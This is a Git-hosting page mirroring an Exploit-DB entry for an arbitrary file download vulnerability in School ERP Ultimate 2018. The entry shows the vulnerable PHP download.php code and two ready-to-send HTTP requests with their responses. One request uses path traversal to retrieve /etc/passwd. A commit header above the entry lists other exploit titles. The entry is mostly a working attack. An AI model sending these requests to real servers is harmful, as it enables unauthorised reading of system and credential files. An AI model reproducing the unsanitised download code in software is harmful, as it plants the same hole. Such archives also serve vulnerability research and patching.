bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45642.txt
Offensive Security defa138d04 DB: 2018-10-23 
17 changes to exploits/shellcodes

Modbus Poll 7.2.2 - Denial of Service (PoC)
AudaCity 2.3 - Denial of Service (PoC)
Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value
Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory
Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport
Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas

Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)

Countly - Persistent Cross-Site Scripting
Countly - Cross-Site Scripting
MySQL Edit Table 1.0 - 'id' SQL Injection
School ERP Ultimate 2018 - Arbitrary File Download
Oracle Siebel CRM 8.1.1 - CSV Injection
The Open ISES Project 3.30A - 'tick_lat' SQL Injection
School ERP Ultimate 2018 - 'fid' SQL Injection
eNdonesia Portal 8.7 - 'artid' SQL Injection
The Open ISES Project 3.30A - Arbitrary File Download
Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
2018-10-23 05:01:48 +00:00

64 lines
No EOL
2.2 KiB
Text
Raw Blame History

# Exploit Title: School ERP Ultimate 2018 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://freeschoolerp.com/
# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip
# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download
# Version: 2018
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/student_staff/download.php?document=[FILE]
# http://localhost/[PATH]/office_admin/download.php?document=[FILE]
#
# /[PATH]/student_staff/download.php
# /[PATH]/office_admin/download.php
# ....
# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
# $file = $_REQUEST['document'];
# header("Content-type: application/force-download");
# header("Content-Transfer-Encoding: Binary");
# header("Content-length: ".filesize($file));
# header("Content-disposition: attachment; filename=\"".$file."\"");
# readfile($file);
# exit;
# }
# ....
GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:30:01 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="download.php"
Content-Length: 337
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:31:34 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="../../../../../etc/passwd"
Content-Length: 46368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
Reference in a new issue View git blame Copy permalink